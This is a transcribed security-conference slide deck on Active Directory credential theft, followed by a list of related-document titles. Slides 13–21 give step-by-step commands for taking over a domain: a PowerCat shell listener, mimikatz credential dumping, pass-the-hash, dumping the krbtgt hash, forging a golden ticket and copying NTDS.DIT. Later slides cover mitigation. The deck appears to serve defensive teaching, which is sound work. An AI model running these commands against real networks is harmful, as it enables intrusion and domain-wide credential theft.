Michael Mayer-Gishyan NSA IT Consulting From Zero to Hero. Domain Admin in einem Tag

Size: px
Start display at page:

Download "Michael Mayer-Gishyan NSA IT Consulting e.u. @mike_srv02 mmg@nsa.co.at http://nsa.co.at. From Zero to Hero. Domain Admin in einem Tag"

Transcription

1 Michael Mayer-Gishyan NSA IT Consulting From Zero to Hero Domain Admin in einem Tag

2 Agenda Vita Introduction to NTLM and Kerberos Pass-the-Hash Techniques First Breach Horizontal and vertical Target hopping Credential-Theft and Right-Elevation Total Active Directory Invasion Mitigation, Mitigation, Mitigation Credits

3 Vita Freelancer IT Security Consultant Blue Team / Cyber Defense Microsoft Addict Motorcyclist BBQ Fanatic Fulltime Geek

4 Introduction to NTLM and Kerberos NTLM (NT LAN Manager) Hashed password on Windows Systems Versions: LM, NTLM, NTLMv2 Used as fallback for Kerberos Computer Accounts also have Passwords Authentication Process: User puts in password on local system Password is hashed The hash will be compared with the one from the Local Security Authority If they match, the access is granted

5 Introduction to NTLM and Kerberos Kerberos Can only be used with Active Directory Works with tickets TGT (Ticket Granting Ticket) - Used for accessing the AD TGS (Ticket Granting Service) - Used for accessing a Service Authentication Process (1/2): AS-REQ: Request for a TGT to the KDC (Key Distribution Center) Encrypted with the ekey (Long Term Key/Encryption Key/User Password) This request has the same as the NTLM Hash (with RC4) AS-REP: If valid, KDC sends back a TGT encrypted with the ekey of the krbtgt Account krbtgt = Kerberos TGT Account = KDC (the same on all DCs) Ticket includes a PAC (Privilege Attribute Certificate) which stores all access groups for the user

6 Introduction to NTLM and Kerberos Authentication Process (2/2): TGS-REQ: To access a resource (CIFS, RPC, etc.) a TGS must be requested Includes the TGT and the Hostname for the server which provides the resource TGS-REP: KDC includes the PAC info and encrypts the TGS with the ekey of the target Server The PAC includes the access rights on the destination AP-REQ: User forwards the TGS to the server and it encrypts it If the decryption succeeds, the server knows that the TGS is valid Because only the KDC knows the ekey, it must assume that this information is correct PAC Validation for built-in services appears after 20 Minutes Like CIFS, RPC, DNS etc.

7 What is Pass-the-Hash? Pass-the-Hash uses the Hash instead of the plaintext Password Resources can be accessed without knowing the actual password Where do I find Password Hashes? LSASS.exe (Local Security Authority Security Subsystem) Memory - Also Dump Files and VM Memory Files Registry NTDS.DIT (Complete AD Database on every Domain Controller) RODC (Read-only DC) only store defined credentials Bbb..but why is nobody doing something? It s not a bug, it s a feature! Without, users need to input their password every time a resource is accessed

8 What is Overpass-the-Hash? The same as Pass-The-Hash, only with Kerberos Instead of the password, the NTLM hash will be used to request Tickets A variant is Pass-the-Key RC4 Key = NTLM hash of the password, not salted by the KDC Can be cracked when the password is weak Also AES128 and AES256 keys can be used Hard to crack, salted and 4096 iterations of the PBKDF2 algorithm Where do I find those keys? LSASS.exe (Client) Except for the Protected Users Security Group (Windows 8 and above) KDC (DC)

9 What is Pass-the-Ticket? A Ticket (TGT) can be stolen and reused by anybody AS-REQ and AS-REP will be skipped TGS-REQ and TGS-REP will be granted by the KDC A stolen TGS won t be noticed by the KDC AP-REQ is only between client and target server Must have want Look for them in the RAM Yes, you can also use dumps

10 What is a Golden Ticket? This is the holy grail, the ticket of all tickets! With it you can access everything in AD It is valid for 20 minutes (PAC Validation) But then you can forge another one Okay, okay I am sold, what do I need? The hash of the krbtgt Account It is almost never changed Basically a TGT is only a TGS for the KDC Domain SID, some Groups, a Username

11 What is a Golden Ticket? HOW is this possible???? Every policy is client side enforced Logon hours, Password expiration, Group Memberships, etc. Only after 20 Minutes the PAC is checked with the KDC Within that period you can do anything! Even create valid tickets for non existing User Accounts Silver Tickets A golden Ticket limited to a single server Created by the hash of the Computer Account Mother of all backdoors -> no communication with KDC

12 First Breach First access to the network through: DMZ attack Malware Exploits Social Engineering Backdoors Physical access

13 First Breach Preparations Login with User Account Start - Run powershell. C:\Tools\PowerCat.ps1 Powercat -l -p -v 4444 Loads PS function for PowerCat listener Don t forget the leading dot! This is your attackers window

14 First Breach Control WS over shell whoami hostname dir C:\WINDOWS\SysWoW64\Config Easy Admin-Rights Check. C:\Tools\Invoke-Mimikatz.ps1 Loads PS function for mimikatz Don t forget the leading dot! Invoke-Mimikatz -command "privilege::debug sekurlsa::logonpasswords Cleartext Passwords!!! *evilgrin*

15 First Breach Where to find credentials? LSASS.exe / RAM Saved Passwords Applications Websites RDP files (Decryption is documented) Group Policies (Patched) WIM images / sysprep.xml (Patched) Backups files VM memory files Scheduled Tasks Service Accounts

16 Horizontal and vertical Target hopping Horizontal Check the local Administrator Credentials They are not changed regularly Often they are the same on Clients Vertical Look for credentials on other hosts Deploy a Keylogger Provoke logon by privileged account tskill explorer.exe

17 Credential-Theft and Right-Elevation C:\Tools\Helpdesk-Me.cmd This will do a local logon with the helpdesk user net user helpdesk /domain Gives a overview in which AD groups the user is C:\Tools\mimikatz.exe (Run as Administrator) privilege::debug sekurlsa::logonpasswords Copy the NTLM hash into clipboard sekurlsa::pth /user:helpdesk /domain:evil.corp /ntlm:hash /run cmd.exe Opens shell with injected hash

18 Credential-Theft and Right-Elevation Check this out! whoami klist dir \\sv01\c$ dir \\dc01\c$ psexec \\sv01 cmd.exe

19 Credential-Theft and Right-Elevation Credential search on a higher tier (Server Level) C:\Tools\mimikatz.exe (Run as Administrator) privilege::debug sekurlsa::logonpasswords Service Account found No plaintext passwords because Wdigest is disabled Copy the NTLM hash! sekurlsa::pth /user:highservice /domain:evil.corp /ntlm:hash /run cmd net user highservice /domain Special account is special! dir \\dc01\c$ klist

20 Total Active Directory Invasion Connect to the Domain Controller psexec \\dc01 cmd C:\Tools\mimikatz.exe privilege::debug lsadump::lsa /inject /name:krbtgt kerberos::golden /domain:evil.corp /sid:<sid> /rc4:<hash> /user:administrator /id:500 /groups:500,501,512,513,518,519,520 /ticket: golden.kirbi Copy this file to your workstation copy golden.kirbi \\WS01\C$\Tools\

21 Total Active Directory Invasion WS: C:\Tools\mimikatz.exe Kerberos::ptt yourname.kirbi Note that there is no privilege::debug needed! misc::cmd Injects Golden Ticket into a cmd window Domain wide entrance card to everything! dir \\dc01\c$ dir \\sv01\c$ COPY ALL THE THINGS!!!! NTDS.DIT - Full AD Database IMPLEMENT ALL THE BACKDOORS!!!! Use Silver Tickets

22

23

24 Mitigation, Mitigation, Mitigation What can I do against this dark sorcery? Implement a tight password change routine (1/2) Computer Accounts: 1 Day Default: 30 Days Service Accounts: 3 Months or use (Group) Managed Service Accounts Default: C mon, be honest. Nobody changes them EVER! krbtgt: Every year or when a Domain Admin leaves Default: Once in like years (when upgrading from DFL 2003 to 2008) User Accounts: 90 Days - The shorter the period is, the easier the passwords get Default: 30 Days DSRM (Directory Services Restore Mode): Twice a year - must be synced manually! Default: Never

25 Mitigation, Mitigation, Mitigation Implement a tight password change routine (2/2) Local Administrator Accounts: 30 days Default: Never Use LAPS (Local Administrator Password Solution) by Microsoft Check the logins of privileged accounts Who leaves traces on which host? Use separate Administration Accounts Never use privileged accounts on your client Domain Admins and similar should use dedicated Administration Workstations No Internet Access Separated from the regular client Use stricter Group Policy Settings

26 Mitigation, Mitigation, Mitigation Check misconfiguration and implement a hardening standard Updates and Patching - This is vital to a healthy infrastructure MS Patch new DCs before promoting! Secure your Clients Don t forget the user! Security Awareness Programs Deploy EMET Log PowerShell and CMD execution AppLocker - Application Whitelisting Solution Deploy it in the DMZ and also on the Clients Use simple rules and adopt legacy apps Use Honeypots to deploy fake credentials Could also be done somewhere hidden on the clients

27 Mitigation, Mitigation, Mitigation Use Jump Gates / Bastion Hosts / Admin Terminal Servers Train your Administrators how to use them Implement a very strict Group Policy A loose configured Terminal Server is a Security Breach, not a Gain! Logging Microsoft ATA Automatically detects PtH, PtT, Golden Ticket attacks Uses a lot disk space SIEM Monitor your clients! Use generous thresholds Check Scheduled Tasks, Autoruns and Environmental Variables Name a specialist who is responsible for following daily security breaches

28 Credits Benjamin Delpy / mimikatz Author Alva Skip Duckwall / PtH Expert Joe Bialek / PowerSploit Author & MSRC Nikhil Mittal / Nishang Author & PowerShell Guru Sean Metcalf / AD Security Specialist - adsecurity.org Microsoft / I <3 U, your software keeps me busy My Wife / I <3 U 2, but somewhat different Everybody who contributes in the name of cyber security

29 Thanks for your attention! Free Anti-Spy Webcam Stickers available at my desk

Red vs. Blue: Modern Active Directory Attacks, Detection, & Protection

Red vs. Blue: Modern Active Directory Attacks, Detection, & Protection Red vs. Blue: Modern Active Directory Attacks, Detection, & Protection Sean Metcalf (@PyroTek3) CTO, DAn Solutions sean [@] dansolutions _._com DAnSolutions.com ADSecurity.org ABOUT Chief Technology Officer

More information

Pass-the-Hash II: Admin s Revenge. Skip Duckwall & Chris Campbell

Pass-the-Hash II: Admin s Revenge. Skip Duckwall & Chris Campbell Pass-the-Hash II: Admin s Revenge Skip Duckwall & Chris Campbell Do you know who I am? Skip Co-presented PTH talk last year at BH, Derbycon http://passing-the-hash.blogspot.com @passingthehash on twitter

More information

Red vs. Blue: Modern Active Directory Attacks, Detection, & Protection

Red vs. Blue: Modern Active Directory Attacks, Detection, & Protection Red vs. Blue: Modern Active Directory Attacks, Detection, & Protection Sean Metcalf (@PyroTek3) CTO, DAn Solutions sean [@] dansolutions _._com http://dansolutions.com http://www.adsecurity.org ABOUT Chief

More information

mimikatz 2.0 Benjamin DELPY `gentilkiwi`

mimikatz 2.0 Benjamin DELPY `gentilkiwi` mimikatz 2.0 Benjamin DELPY `gentilkiwi` Our little story `whoami`, why am I doing this? mimikatz 2.0 & sekurlsa Focus on Windows 8.1 et 2012r2 Kerberos & strong authentication Questions / Answers And

More information

Red vs. Blue: Modern Active Directory Attacks, Detection, and Protection Whitepaper

Red vs. Blue: Modern Active Directory Attacks, Detection, and Protection Whitepaper Red vs. Blue: Modern Active Directory Attacks, Detection, and Protection Whitepaper Author: Sean Metcalf CTO Dan Solutions, Inc. sean@dansolutions.com www.dansolutions.com ADSecurity.org Contents Introduction...

More information

How to Efficiently Protect Active Directory from Credential Theft & Large Scale Compromise

How to Efficiently Protect Active Directory from Credential Theft & Large Scale Compromise How to Efficiently Protect Active Directory from Credential Theft & Large Scale Compromise An Approach Based on Real-World Expertise Friedwart Kuhn, fkuhn@ernw.de Digital unterschrieben von Friedwart Kuhn

More information

WATCHING THE WATCHDOG: PROTECTING KERBEROS AUTHENTICATION WITH NETWORK MONITORING

WATCHING THE WATCHDOG: PROTECTING KERBEROS AUTHENTICATION WITH NETWORK MONITORING WATCHING THE WATCHDOG: PROTECTING KERBEROS AUTHENTICATION WITH NETWORK MONITORING Authors: Tal Be ery, Sr. Security Research Manager, Microsoft Michael Cherny, Sr. Security Researcher, Microsoft November

More information

Recent Cyber Attack Cases in Taiwan

Recent Cyber Attack Cases in Taiwan Recent Cyber Attack Cases in Taiwan TWNCERT (National Center for Cyber Security Technology) Outline Cyber Attack Trends in Taiwan Cyber Attack Cases Studies Attack via Network Equipment Attack via AD Golden

More information

Agenda. Red Team Difference to a Pen Test Common RT Techniques Blue Team

Agenda. Red Team Difference to a Pen Test Common RT Techniques Blue Team Red Teaming Agenda Red Team Difference to a Pen Test Common RT Techniques Blue Team Disclaimer Red Teaming is a contentious term with no set definition Conceptions vary and can be situated on a scale from

More information

Five Steps to Improve Internal Network Security. Chattanooga ISSA

Five Steps to Improve Internal Network Security. Chattanooga ISSA Five Steps to Improve Internal Network Security Chattanooga ISSA 1 Find Me AverageSecurityGuy.info @averagesecguy stephen@averagesecurityguy.info github.com/averagesecurityguy ChattSec.org 2 Why? The methodical

More information

Abusing Microsoft Kerberos sorry you guys don t get it. by Alva `Skip` DUCKWALL & Benjamin DELPY

Abusing Microsoft Kerberos sorry you guys don t get it. by Alva `Skip` DUCKWALL & Benjamin DELPY Abusing Microsoft Kerberos sorry you guys don t get it by Alva `Skip` DUCKWALL & Benjamin DELPY `whoami` - Skip Alva `Skip` DUCKWALL @ passingthehash http://passing-the-hash.blogspot.com author of papers

More information

Windows Attack - Gain Enterprise Admin Privileges in 5 Minutes

Windows Attack - Gain Enterprise Admin Privileges in 5 Minutes Windows Attack - Gain Enterprise Admin Privileges in 5 Minutes Compass Security AG, Daniel Stirnimann Compass Security AG Glärnischstrasse 7 Postfach 1628 CH-8640 Rapperswil Tel +41 55-214 41 60 Fax +41

More information

Internal Penetration Test

Internal Penetration Test Internal Penetration Test Agenda Time Agenda Item 10:00 10:15 Introduction 10:15 12:15 Seminar: Web Application Penetration Test 12:15 12:30 Break 12:30 13:30 Seminar: Social Engineering Test 13:30 15:00

More information

Who DIT It? Detecting and Mitigating Privilege Escalation Attacks on the Active Directory Data Store

Who DIT It? Detecting and Mitigating Privilege Escalation Attacks on the Active Directory Data Store Who DIT It? Detecting and Mitigating Privilege Escalation Attacks on the Active Directory Data Store Mike Middleton Justin Prosco Mandiant, A FireEye Company Mike Middleton Principal Consultant Joined

More information

Managing Local Administrator Passwords with LAPS 10/14/2015 PENN STATE SECURITY CONFERENCE

Managing Local Administrator Passwords with LAPS 10/14/2015 PENN STATE SECURITY CONFERENCE Managing Local Administrator Passwords with LAPS 2015 PENN STATE SECURITY CONFERENCE DAN BARR DRB45@PSU.EDU SYSTEMS ADMINISTRATOR, APPLIED RESEARCH LABORATORY The Shared Password Threat Shared passwords

More information

Protection from Kerberos Golden Ticket

Protection from Kerberos Golden Ticket Protection from Kerberos Golden Ticket Mitigating pass the ticket on Active Directory CERT-EU Security White Paper 2014-07 1 Introduction Kerberos authentication protocol is the preferred authentication

More information

Windows passwords security

Windows passwords security IT Advisory Windows passwords security ADVISORY WHOAMI 2 Agenda The typical windows environment Local passwords Secure storage mechanims: Syskey & SAM File Password hashing & Cracking: LM & NTLM Into the

More information

Windows Server 2008/2012 Server Hardening

Windows Server 2008/2012 Server Hardening Account Policies Enforce password history 24 Maximum Password Age - 42 days Minimum Password Age 2 days Minimum password length - 8 characters Password Complexity - Enable Store Password using Reversible

More information

Taming the beast : Assess Kerberos-protected networks

Taming the beast : Assess Kerberos-protected networks Taming the beast : Assess Kerberos-protected networks [ Work in progress Black Hat EU 2009] Emmanuel Bouillon Commissariat à l'energie Atomique, Centre DAM-Île de France, Bruyères-le-Châtel 91297 Arpajon

More information

Introduction to Computer Security

Introduction to Computer Security Introduction to Computer Security Authentication and Access Control Pavel Laskov Wilhelm Schickard Institute for Computer Science Resource access: a big picture 1. Identification Which object O requests

More information

qliqdirect Active Directory Guide

qliqdirect Active Directory Guide qliqdirect Active Directory Guide qliqdirect is a Windows Service with Active Directory Interface. qliqdirect resides in your network/server and communicates with qliqsoft cloud servers securely. qliqdirect

More information

Kerberos Golden Ticket Protection

Kerberos Golden Ticket Protection CERT-EU Security Whitepaper 2014-007 Kerberos Golden Ticket Protection Mitigating Pass-the-Ticket on Active Directory Miguel SORIA-MACHADO, Didzis ABOLINS, Ciprian BOLDEA, Krzysztof SOCHA ver. 1.4 April

More information

Additional Security Considerations and Controls for Virtual Private Networks

Additional Security Considerations and Controls for Virtual Private Networks CYBER SECURITY OPERATIONS CENTRE APRIL 2013 (U) LEGAL NOTICE: THIS PUBLICATION HAS BEEN PRODUCED BY THE DEFENCE SIGNALS DIRECTORATE (DSD), ALSO KNOWN AS THE AUSTRALIAN SIGNALS DIRECTORATE (ASD). ALL REFERENCES

More information

Protecting Your Organisation from Targeted Cyber Intrusion

Protecting Your Organisation from Targeted Cyber Intrusion Protecting Your Organisation from Targeted Cyber Intrusion How the 35 mitigations against targeted cyber intrusion published by Defence Signals Directorate can be implemented on the Microsoft technology

More information

WHY ATTACKER TOOLSETS DO WHAT THEY DO

WHY ATTACKER TOOLSETS DO WHAT THEY DO WHY ATTACKER TOOLSETS DO WHAT THEY DO (or.. Reasons they just keep working ) Matt McCormack OVER THE LAST YEAR 50+ engagements Good chunk of different verticals, industries, etc. Varying qualities and

More information

Mitigating Pass-the-Hash (PtH) Attacks and Other Credential Theft Techniques. Mitigating the risk of lateral movement and privilege escalation

Mitigating Pass-the-Hash (PtH) Attacks and Other Credential Theft Techniques. Mitigating the risk of lateral movement and privilege escalation Mitigating Pass-the-Hash (PtH) Attacks and Other Credential Theft Techniques Mitigating the risk of lateral movement and privilege escalation Mitigating Pass-the-Hash (PtH) Attacks and Other Credential

More information

Pass-the-Hash: How Attackers Spread and How to Stop Them

Pass-the-Hash: How Attackers Spread and How to Stop Them Pass-the-Hash: How Attackers Spread and How to Stop Them SESSION ID: HTA-W03 Mark Russinovich Technical Fellow Microsoft Corporation Nathan Ide Principal Development Lead Microsoft Corporation Pass-the-Hash:

More information

University of Maryland Active Directory Policies

University of Maryland Active Directory Policies University of Maryland Active Directory Policies Purpose of this policy Scope AD Forest Forest Schema & Data Visibility Account and Group Synchronization Account Creation and Password Forest Security Principle

More information

FORENSIC ARTIFACTS FROM A PASS THE HASH (PTH) ATTACK BY: GERARD LAYGUI

FORENSIC ARTIFACTS FROM A PASS THE HASH (PTH) ATTACK BY: GERARD LAYGUI FORENSIC ARTIFACTS FROM A PASS THE HASH (PTH) ATTACK BY: GERARD LAYGUI DISCLAIMER: THE VIEWS AND OPINIONS EXPRESSED IN THIS PRESENTATION ARE THOSE OF THE AUTHOR S AND DOES NOT NECESSARILY REPRESENT THE

More information

CS 356 Lecture 25 and 26 Operating System Security. Spring 2013

CS 356 Lecture 25 and 26 Operating System Security. Spring 2013 CS 356 Lecture 25 and 26 Operating System Security Spring 2013 Review Chapter 1: Basic Concepts and Terminology Chapter 2: Basic Cryptographic Tools Chapter 3 User Authentication Chapter 4 Access Control

More information

Kerberos. Public domain image of Heracles and Cerberus. From an Attic bilingual amphora, 530 520 BC. From Italy (?).

Kerberos. Public domain image of Heracles and Cerberus. From an Attic bilingual amphora, 530 520 BC. From Italy (?). Kerberos Public domain image of Heracles and Cerberus. From an Attic bilingual amphora, 530 520 BC. From Italy (?). 1 Kerberos Kerberos is an authentication protocol and a software suite implementing this

More information

IWA AUTHENTICATION FUNDAMENTALS AND DEPLOYMENT GUIDELINES

IWA AUTHENTICATION FUNDAMENTALS AND DEPLOYMENT GUIDELINES IWA AUTHENTICATION FUNDAMENTALS AND DEPLOYMENT GUIDELINES TECHNICAL BRIEF INTRODUCTION The purpose of this document is to explain how Integrated Windows Authentication (IWA) works with the ProxySG appliance,

More information

Microsoft Auditing Events for Windows 2000/2003 Active Directory. By Ed Ziots Version 1.6 9/20/2005

Microsoft Auditing Events for Windows 2000/2003 Active Directory. By Ed Ziots Version 1.6 9/20/2005 Microsoft Auditing Events for Windows 2000/2003 Active Directory. By Ed Ziots Version 1.6 9/20/2005 Revision 1.3: Cleaned up resources and added additional detail into each auditing table. Revision 1.4:

More information

Computer Security: Principles and Practice

Computer Security: Principles and Practice Computer Security: Principles and Practice Chapter 24 Windows and Windows Vista Security First Edition by William Stallings and Lawrie Brown Lecture slides by Lawrie Brown Windows and Windows Vista Security

More information

Introduction to Computer Security

Introduction to Computer Security Introduction to Computer Security Identification and Authentication Pavel Laskov Wilhelm Schickard Institute for Computer Science Resource access: a big picture 1. Identification Which object O requests

More information

Information Assurance Directorate

Information Assurance Directorate National Security Agency/Central Security Service Information Assurance Directorate Reducing the Effectiveness of Pass-the-Hash November 19, 2013 Revision 1 A product of the Network Components and Applications

More information

4.2: Kerberos Kerberos V4 Kerberos V5. Chapter 5: Security Concepts for Networks. Lehrstuhl für Informatik 4 Kommunikation und verteilte Systeme

4.2: Kerberos Kerberos V4 Kerberos V5. Chapter 5: Security Concepts for Networks. Lehrstuhl für Informatik 4 Kommunikation und verteilte Systeme Chapter 2: Security Techniques Background Chapter 3: Security on Network and Transport Layer Chapter 4: Security on the Application Layer Secure Applications Network Authentication Service: Kerberos 4.2:

More information

Installation Manual v2.0.0

Installation Manual v2.0.0 Installation Manual v2.0.0 Contents ResponseLogic Install Guide v2.0.0 (Command Prompt Install)... 3 Requirements... 4 Installation Checklist:... 4 1. Download and Unzip files.... 4 2. Confirm you have

More information

Defense Security Service Office of the Designated Approving Authority Standardization of Baseline Technical Security Configurations

Defense Security Service Office of the Designated Approving Authority Standardization of Baseline Technical Security Configurations Defense Security Service Office of the Designated Approving Authority Standardization of Baseline Technical Security Configurations March 2009 Version 2.2 This page intentionally left blank. 2 1. Introduction...4

More information

Still Passing the Hash 15 Years Later

Still Passing the Hash 15 Years Later Still Passing the Hash 15 Years Later Using the Keys to the Kingdom to Access All Your Data Alva Skip Duckwall Chris Campbell Help Us Get Better! Please Fill Out The Speaker Surveys! Do You Know Who I

More information

By Skip Duckwall and Chris Campbell

By Skip Duckwall and Chris Campbell By Skip Duckwall and Chris Campbell for Blackhat USA 2013 Introduction User credentials are one of the most powerful items an attacker can obtain. Single-factor, or passwordbased credentials are dangerous

More information

Security Overview for Windows Vista. Bob McCoy, MCSE, CISSP/ISSAP Technical Account Manager Microsoft Corporation

Security Overview for Windows Vista. Bob McCoy, MCSE, CISSP/ISSAP Technical Account Manager Microsoft Corporation Security Overview for Windows Vista Bob McCoy, MCSE, CISSP/ISSAP Technical Account Manager Microsoft Corporation Agenda User and group changes Encryption changes Audit changes User rights New and modified

More information

Five Steps to Improve Internal Network Security. Chattanooga Information security Professionals

Five Steps to Improve Internal Network Security. Chattanooga Information security Professionals Five Steps to Improve Internal Network Security Chattanooga Information security Professionals Who Am I? Security Analyst: Sword & Shield Blogger: averagesecurityguy.info Developer: github.com/averagesecurityguy

More information

ILTA HANDS ON Securing Windows 7

ILTA HANDS ON Securing Windows 7 Securing Windows 7 8/23/2011 Table of Contents About this lab... 3 About the Laboratory Environment... 4 Lab 1: Restricting Users... 5 Exercise 1. Verify the default rights of users... 5 Exercise 2. Adding

More information

Xerox DocuShare Security Features. Security White Paper

Xerox DocuShare Security Features. Security White Paper Xerox DocuShare Security Features Security White Paper Xerox DocuShare Security Features Businesses are increasingly concerned with protecting the security of their networks. Any application added to a

More information

Why You Need to Detect More Than PtH. Matt Hathaway, Senior Product Manager, Rapid7 Jeff Myers, Lead Software Engineer, Rapid7

Why You Need to Detect More Than PtH. Matt Hathaway, Senior Product Manager, Rapid7 Jeff Myers, Lead Software Engineer, Rapid7 Why You Need to Detect More Than PtH Matt Hathaway, Senior Product Manager, Rapid7 Jeff Myers, Lead Software Engineer, Rapid7 Who We Are! Matt Hathaway Senior Product Manager for Rapid7 UserInsight Former

More information

Network Architecture & Active Directory Considerations for the PI System. Bryan Owen - OSIsoft Joel Langill - SCADAhacker

Network Architecture & Active Directory Considerations for the PI System. Bryan Owen - OSIsoft Joel Langill - SCADAhacker Network Architecture & Active Directory Considerations for the PI System By: Bryan Owen - OSIsoft Joel Langill - SCADAhacker Agenda Moore s Law Network Architecture Domain Services in a DMZ 2 HD Moore

More information

Exploiting Transparent User Identification Systems

Exploiting Transparent User Identification Systems Exploiting Transparent User Identification Systems Wayne Murphy Benjamin Burns Version 1.0a 1 CONTENTS 1.0 Introduction... 3 1.1 Project Objectives... 3 2.0 Brief Summary of Findings... 4 3.0 Background

More information

Using Integrated Windows Authentication with Websense Content Gateway, v7.6

Using Integrated Windows Authentication with Websense Content Gateway, v7.6 Using Integrated Windows Authentication with Websense Content Gateway, v7.6 Websense Support Webinar August 2011 web security data security email security Support Webinars 2009 Websense, Inc. All rights

More information

How To - Implement Single Sign On Authentication with Active Directory

How To - Implement Single Sign On Authentication with Active Directory How To - Implement Single Sign On Authentication with Active Directory Applicable to English version of Windows This article describes how to implement single sign on authentication with Active Directory

More information

SESSION 507 Thursday, March 26, 11:15 AM - 12:15 PM Track: Desktop Support

SESSION 507 Thursday, March 26, 11:15 AM - 12:15 PM Track: Desktop Support SESSION 507 Thursday, March 26, 11:15 AM - 12:15 PM Track: Desktop Support Desktop Support and Data Breaches: The Unknown Dangers Bryan Hood Senior Solutions Engineer, Bomgar bhood@bomgar.com Session Description

More information

Enhanced Security Administrative Environment. Wally Lee Cybersecurity Architect Cybersecurity Global Practice

Enhanced Security Administrative Environment. Wally Lee Cybersecurity Architect Cybersecurity Global Practice Enhanced Security Administrative Environment Wally Lee Cybersecurity Architect Cybersecurity Global Practice INTERNATIONAL HEADLINES Britain targeted by 120,000 cyber attacks every DAY Anonymous intends

More information

NIST PKI 06: Integrating PKI and Kerberos (updated April 2007) Jeffrey Altman

NIST PKI 06: Integrating PKI and Kerberos (updated April 2007) Jeffrey Altman NIST PKI 06: Integrating PKI and Kerberos (updated April 2007) Jeffrey Altman The Slow Convergence of PKI and Kerberos At Connectathon 1995 Dan Nessett of Sun Microsystems was quoted saying Kerberos will

More information

Stealing credentials for impersonation

Stealing credentials for impersonation Stealing credentials for impersonation Emmanuel Bouillon manu@veryopenid.net October 29, 2010 Disclaimer Introduction This expresses my own views and does not involve my previous, current and future employers.

More information

How To - Implement Clientless Single Sign On Authentication in Single Active Directory Domain Controller Environment

How To - Implement Clientless Single Sign On Authentication in Single Active Directory Domain Controller Environment How To - Implement Clientless Single Sign On Authentication in Single Active Directory Domain Controller Environment How To - Implement Clientless Single Sign On Authentication with Active Directory Applicable

More information

Dell Compellent Storage Center

Dell Compellent Storage Center Dell Compellent Storage Center Active Directory Integration Best Practices Guide Dell Compellent Technical Solutions Group January, 2013 THIS BEST PRACTICES GUIDE IS FOR INFORMATIONAL PURPOSES ONLY, AND

More information

Websense Support Webinar: Questions and Answers

Websense Support Webinar: Questions and Answers Websense Support Webinar: Questions and Answers Configuring Websense Web Security v7 with Your Directory Service Can updating to Native Mode from Active Directory (AD) Mixed Mode affect transparent user

More information

Configure and enable remote access for windows operating system

Configure and enable remote access for windows operating system Configure and enable remote access for windows operating system There can be several reasons on why you cannot access a remote computer in your network. In this guide we will focus on troubleshooting the

More information

Contents. Supported Platforms. Event Viewer. User Identification Using the Domain Controller Security Log. SonicOS

Contents. Supported Platforms. Event Viewer. User Identification Using the Domain Controller Security Log. SonicOS SonicOS User Identification Using the Domain Controller Security Log Contents Supported Platforms... 1 Event Viewer... 1 Configuring Group Policy to Enable Logon Audit... 2 Events in Security Log... 4

More information

VISA SECURITY ALERT December 2015 KUHOOK POINT OF SALE MALWARE. Summary. Distribution and Installation

VISA SECURITY ALERT December 2015 KUHOOK POINT OF SALE MALWARE. Summary. Distribution and Installation VISA SECURITY ALERT December 2015 KUHOOK POINT OF SALE MALWARE Distribution: Merchants, Acquirers Who should read this: Information security, incident response, cyber intelligence staff Summary Kuhook

More information

Bypassing Local Windows Authentication to Defeat Full Disk Encryption. Ian Haken

Bypassing Local Windows Authentication to Defeat Full Disk Encryption. Ian Haken Bypassing Local Windows Authentication to Defeat Full Disk Encryption Ian Haken Who Am I? Currently a security researcher at Synopsys, working on application security tools and Coverity s static analysis

More information

TopEase Single Sign On Windows AD

TopEase Single Sign On Windows AD TopEase Single Sign On Windows AD Version Control: Version Status Datum / Kurzzeichen Begründung 1.0 Final 09.09.12 / gon New template and logo Copyright: This document is the property of Business-DNA

More information

TAKING SECURITY TESTING TO THE NEXT LEVEL 5 MAY 2014 STAN HEGT

TAKING SECURITY TESTING TO THE NEXT LEVEL 5 MAY 2014 STAN HEGT + = TAKING SECURITY TESTING TO THE NEXT LEVEL 5 MAY 2014 STAN HEGT HAVE YOU EVER ENCOUNTERED AN ADVERSARY THAT RAN NESSUS FROM A MEETING ROOM? PENETRATION TESTING vs RED TEAMING Penetration Testing Red

More information

MS-50292 - MCITP: Windows 7 Enterprise Desktop Support Technician Boot Camp

MS-50292 - MCITP: Windows 7 Enterprise Desktop Support Technician Boot Camp MS-50292 - MCITP: Windows 7 Enterprise Desktop Support Technician Boot Camp Table of Contents Introduction Audience At Completion Prerequisites Microsoft Certified Professional Exams Student Materials

More information

MCTS Guide to Microsoft Windows 7. Chapter 7 Windows 7 Security Features

MCTS Guide to Microsoft Windows 7. Chapter 7 Windows 7 Security Features MCTS Guide to Microsoft Windows 7 Chapter 7 Windows 7 Security Features Objectives Describe Windows 7 Security Improvements Use the local security policy to secure Windows 7 Enable auditing to record security

More information

QliqDIRECT Active Directory Guide

QliqDIRECT Active Directory Guide QliqDIRECT Active Directory Guide QliqDIRECT is a Windows Service with Active Directory Interface. QliqDIRECT resides in your network/server and communicates with Qliq cloud servers securely. QliqDIRECT

More information

NetBrain Security Guidance

NetBrain Security Guidance NetBrain Security Guidance 1. User Authentication and Authorization 1.1. NetBrain Components NetBrain Enterprise Server includes five components: Customer License Server (CLS), Workspace Server (WSS),

More information

Network Assessment. Prepared For: Prospect Or Customer Prepared By: Your Company Name

Network Assessment. Prepared For: Prospect Or Customer Prepared By: Your Company Name Network Assessment Prepared For: Prospect Or Customer Prepared By: Your Company Name Environment Risk and Issue Score Issue Review Next Steps Agenda Environment - Overview Domain Domain Controllers 4 Number

More information

05 June 2015 A-000061-MW TLP: GREEN

05 June 2015 A-000061-MW TLP: GREEN 05 June 2015 Alert Number A-000061-MW Please contact the FBI with any questions related to this FLASH Report at either your local Cyber Task Force or FBI CYWATCH. Email: cywatch@ic.fbi.gov Phone: 1-855-292-3937

More information

Password Reset PRO. Quick Setup Guide for Single Server or Two-Tier Installation

Password Reset PRO. Quick Setup Guide for Single Server or Two-Tier Installation Password Reset PRO Quick Setup Guide for Single Server or Two-Tier Installation This guide covers the features and settings available in Password Reset PRO version 3.x.x. Please read this guide completely

More information

Penetration Test Report

Penetration Test Report Penetration Test Report MegaCorp One August 10 th, 2013 Offensive Security Services, LLC 19706 One Norman Blvd. Suite B #253 Cornelius, NC 28031 United States of America Tel: 1-402-608-1337 Fax: 1-704-625-3787

More information

HELP DOCUMENTATION E-SSOM INSTALLATION GUIDE

HELP DOCUMENTATION E-SSOM INSTALLATION GUIDE HELP DOCUMENTATION E-SSOM INSTALLATION GUIDE Copyright 1998-2013 Tools4ever B.V. All rights reserved. No part of the contents of this user guide may be reproduced or transmitted in any form or by any means

More information

PineApp Surf-SeCure Quick

